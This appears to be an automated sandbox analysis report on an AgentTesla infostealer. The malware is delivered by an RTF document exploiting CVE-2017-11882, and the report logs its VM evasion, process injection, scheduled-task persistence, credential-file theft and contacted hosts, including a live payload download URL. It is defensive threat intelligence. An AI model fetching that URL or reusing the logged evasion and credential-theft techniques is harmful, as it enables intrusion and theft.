Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147168383.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 260, type: MEMORY
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.2181524.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.21fd698.4.raw.unpack, type: UNPACKEDPE

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Window / User API: threadDelayed 9487

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1320	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2816	Thread sleep time: -57801s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2816	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 920	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2436	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2028	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe TID: 2028	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2146808348.00000000004DA000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2150808892.0000000004E4F000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Code function: 7_2_00404159 LdrInitializeThunk,

7_2_00404159

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Memory written: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Jump to behavior

Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404287230.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404287230.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404287230.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.2147750440.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2403848274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 260, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 1696, type: MEMORY
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsmbvbvcrtyjgh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3363940.6.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 1696, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.2147750440.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2403848274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 260, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 1696, type: MEMORY
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsmbvbvcrtyjgh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsmbvbvcrtyjgh.exe.3363940.6.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Obfuscated Files or Information2	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Security Software Discovery311	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion13	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INQUIRY_RFQ_20210208.doc	44%	Virustotal		Browse
INQUIRY_RFQ_20210208.doc	49%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe	23%	ReversingLabs	ByteCode-MSIL.Trojan.Pwsx
C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	23%	ReversingLabs	ByteCode-MSIL.Trojan.Pwsx
C:\Users\user\AppData\Roaming\hEeIyOK.exe	23%	ReversingLabs	ByteCode-MSIL.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.RegAsmbvbvcrtyjgh.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
globalteamacademy.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://GTUj5adfCGo.org	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.chambersign.Q	0%	Avira URL Cloud	safe
https://ca.sia.it/seccli/repository/CPS0	0%	URL Reputation	safe
https://ca.sia.it/seccli/repository/CPS0	0%	URL Reputation	safe
https://ca.sia.it/seccli/repository/CPS0	0%	URL Reputation	safe
https://ca.sia.it/seccli/repository/CPS0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://etNSag.com	0%	Avira URL Cloud	safe
http://GTUj5adfCGo.orgbr>48Em	0%	Avira URL Cloud	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.globaltrust.info0=	0%	Avira URL Cloud	safe
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0	0%	URL Reputation	safe
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0	0%	URL Reputation	safe
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://www.crc.bg0	0%	URL Reputation	safe
http://www.crc.bg0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
globalteamacademy.com	43.252.37.193	true	true	7%, Virustotal, Browse	unknown
mail.privateemail.com	198.54.122.60	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://GTUj5adfCGo.orgbr>48Em	true	Avira URL Cloud: safe	low
http://globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net03	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://GTUj5adfCGo.org	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
